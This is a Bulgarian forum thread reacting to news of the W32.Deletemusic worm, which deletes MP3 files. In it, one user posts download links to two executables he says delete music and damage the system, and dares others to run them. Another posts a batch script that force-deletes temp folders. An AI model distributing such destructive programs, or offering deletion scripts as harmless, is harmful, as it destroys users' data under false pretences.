Премини към съдържанието
Форумът в приложение

По-лесно сърфиране. Научи повече.

Kaldata.com - Форуми

Приложение на форума на цял екран с push известия, значки и други.

За да инсталирате това приложение на iOS и iPadOS
  1. Докоснете Иконата за споделяне в Safari
  2. Превъртете менюто и докоснете Добавяне към началния екран.
  3. Докоснете Добавяне в горния десен ъгъл.
За да инсталирате това приложение на Android
  1. Докоснете менюто с 3 точки (⋮) в горния десен ъгъл на браузъра.
  2. Докоснете Добавяне към началния екран или Инсталиране на приложение.
  3. Потвърдете, като докоснете Инсталиране.

Добре дошли!

Добре дошли в нашите форуми, пълни с полезна информация. Имате проблем с компютъра или телефона си? Публикувайте нова тема и ще намерите решение на всичките си проблеми. Общувайте свободно и открийте безброй нови приятели.

Моля, регистрирайте се за да публикувате тема и да получите пълен достъп до всички функции.

MP3 вирус се бори с нелегалното пиратство

Featured Replies

Музикалният бизнес най-накрая се сдоби с оръжие срещу пиратството и незаконното разпространиение на музика.

mp333.jpg

Засечен е нов вирус, който попадайки в компютъра се добира до всички файлове в mp3 формат и ги унищожава.

Вирусът е кръстен "W32. Deletemusic" и Разпознава mp3 файловете не само в компютъра ви, но и в прикачените към него устройства. За сега се смята, че вирусът не засяга потребителите на Mac и Linux, а само тези на Windows.Унищожителят на mp3-ки е засечен в края на юли и се подозира, че създателят му е тинейджър от САЩ.

avtora.com

Значи да си прекодираме песните в някаквъв друг формат(OGG или WMA например) и проблема ще се реши, или тинейджъра ще пуска собствен формат и този вирус е стратегия за налагането му на пазара biggrin.gif

Бях чувал или за този ли за подобен отнякъде, но бързо отшумя...

Оше информация ои темата:

0000000919-article.jpg

http://big.bg/modules/news03/article.php?storyid=28057

А тук специално за новите творения:

www.bglaf.org/

Редактирано от B-boy[StyLe] (преглед на промените)

Бях чувал или за този ли за подобен отнякъде, но бързо отшумя...

И аз така бях чул и невярвах,ама се оказа изтина... :yanim:

Значи да си прекодираме песните в някаквъв друг формат(OGG или WMA например) и проблема ще се реши...

А колко време ще е нужно да се прекодират няколко хиляди файла?

Не се притеснявам от това ново творение, а и според написаното, гадът е локализиран още на 30 юли от Symantec, McAfee също го имат в списъка си, не вярвам и другите сериозни производители на защитен софтуер да го пропуснат в ъпдейтите си.

На тая сиромашия само това ми трябва

Хахаха взимаш ми думите от устата. ;) До колкото разбрах червея е написан на езика на ''Delphi'' и заемал само 380 килобайта място.

Ето и решението на проблема :Pтук

Редактирано от Nikolai1990 (преглед на промените)

• 2 седмици по-късно...

Тва може да го направи и една елементарна програма изпозваща дос комади за намиране на песните и за триенето им.Стига да се кътне на място,където не може да се забележи ще създаде огромни проблеми.А антивирусната нищо няма да засече.кода на тази програма ще бъде 2 реда.

Тва може да го направи и една елементарна програма изпозваща дос комади за намиране на песните и за триенето им.Стига да се кътне на място,където не може да се забележи ще създаде огромни проблеми.А антивирусната нищо няма да засече.кода на тази програма ще бъде 2 реда.

И половин ред да е ще го засече :P . Основният проблем при вирусите е размножителната система. Не е като преди пускаш едно I love You и всички шарани на въдицата.

Нищо няма да засече гаранция!Това е само едно .ехе чийто код ще изпълнява дос команди.Ако искаш аз ще напиша ти ще провериш.

Нищо няма да засече гаранция!Това е само едно .ехе чийто код ще изпълнява дос команди.Ако искаш аз ще напиша ти ще провериш.

Като почнете с такива изказвания...Много приятели са се пробвали да напишат вирусче което не се засича...обикновенно с разширение *.bat...но дори и да го няма във вирусните дефиниции се хваще без проблем от про-активните системи за защита...следящи за промени в регистрите и т.н.

Как ще се разпространи това твое *.ехе? А и за да се засече даден вирус трябва да е поразил достатъчно на брой компютри и да е привлякъл вниманието на антивирусните компании които да го анализират и да пуснат лек за него...Мислиш ли че вируса от фамилията Constructor е нещо по-различно или си мислиш че си открил топлата вода?

Щял да бъде на два реда...Теста на EICAR е даже на един...

Единствените по трудни за засичане, са вируси спътници, но те обикновено променят/трият съдържанието в папките в които се намират...т.е. трудно ще направи поражение...

http://www.mladprogramist.com/Read/lecture.55.res

Ми хайде напиши го това ехе пък го дай да го видим? Може пък да не го засича нито една АВ програма.

Тъпчо, нямал си друга работа, а сметка на хората ще държи какво правят. Е, по-голямата част от моята музика е на дискове, които не са в компа, защото обичамд а си пускам в моята стая музика с дискмена :P;):wors:

Готов съм с програмата.Въпросът е,че нямах възможност да я тествам под Уиндоус и за това не гарантирам нищо.Ето и въпросният линк:

http://files-upload.com/files/472012/hack.exe

Единствената ви работа е да влезете в програмата и да следите дали ви чезнат музичките.

Написах и още една програма за по-напористите:

http://files-upload.com/files/472055/hack1.exe

За тази пак не гарантирам,че ще върви поради същата причина.

Заповядайте и се наслаждавайте.Ако искате го сканирайте,нищо няма да откриете.Ако изтеглите втората програма и я стартирате съм сигурен,че скоро няма да пишете.Айде това е от мен.Вие кажете как сте си изпатили.

П.П Редактирах сорса на втората програма поради нелепа грешка.Вече може да я теглите!

Редактирано от bggashnik (преглед на промените)

айде де нали ме предизвикахте.Кажете дали върви и дали сте успели да се оправите.

1.Това не е точно вирус, защото не се саморазпространява и антивирусните не го третират като такъв!

И един прост скрипт файл да направиш и да го запаметиш като *.bat няма да се третира като такъв в повечето случаи макар че: Windows NT, Windows 2000, Windows XP не използват Autoexec.bat.

@ECHO OFF

IF NOT %temp% == %tmp% GOTO both_

GOTO single

:both

DEL %temp%\*.* /F /S /Q

DEL %tmp%\*.* /F /S /Q

CLS

ECHO Deleted all files in the TEMP folder: %temp%

ECHO Deleted all files in the TMP folder: %tmp%

GOTO end

:single

DEL %temp%\*.* /F /S /Q

CLS

ECHO Deleted all files in the TEMP folder: %temp%

:end

2.Да не се открива от антивирусните, но не знам и дали работи...не мога да го тествам от работата.

1.Разпространява се!

2.Както написа, антивирусните не го засичат, а и няма как да го третират катоцвирус като го написах вчера.

3.не съм използвал бат файлове,защото се разкрива съдържанието им от антивирусната и от юзъра.

Пак да повторя,че не мога да дам гаранции,че работи поради проблем с Уиндоуса.

1.Разпространява се!

2.Както написа, антивирусните не го засичат, а и няма как да го третират катоцвирус като го написах вчера.

3.не съм използвал бат файлове,защото се разкрива съдържанието им от антивирусната и от юзъра.

Пак да повторя,че не мога да дам гаранции,че работи поради проблем с Уиндоуса.

Как ще го засичат АВ-тата, като това не е вирус? А и скриптовете се блокират дори в Интернет Експлорер!

Редактирано от tigertron (преглед на промените)

Добре не е вирус,а е просто програма,която ти трие музиката.Я кажи ти тества ли го?

Добре не е вирус,а е просто програма,която ти трие музиката.Я кажи ти тества ли го?

Да ... и музиката си ми е на харда и твоята "програма" не работи cool.gif

Научи се наистина да пишеш вируси. и спри със спама!

това е най голямата глупост за която съм чувал ама така е едни ще печелят други ще губят.В днешно време си и е*ало векото biggrin.gif

Регистрирайте се или влезете в профила си за да коментирате

Разглеждащи това в момента 0

• Няма регистрирани потребители разглеждащи тази страница.

Дарение

• Подкрепи съществуването на форума - направи дарение
    32%
    Дарени 315 € от нужните 1 000 €

Бюлетин

Получавайте известие, когато има важна промяна или новина свързана с форума.

Профил

Навигация

Търсене

Търсене

Конфигуриране на push известия в браузъра

Chrome (Android)
  1. Докоснете иконата на катинар до адресната лента.
  2. Докоснете Разрешения → Известия.
  3. Променете предпочитанията си.
Chrome (Desktop)
  1. Кликнете върху иконата на катинар в адресната лента.
  2. Изберете Настройки на сайта.
  3. Намерете Известия и коригирайте предпочитанията си.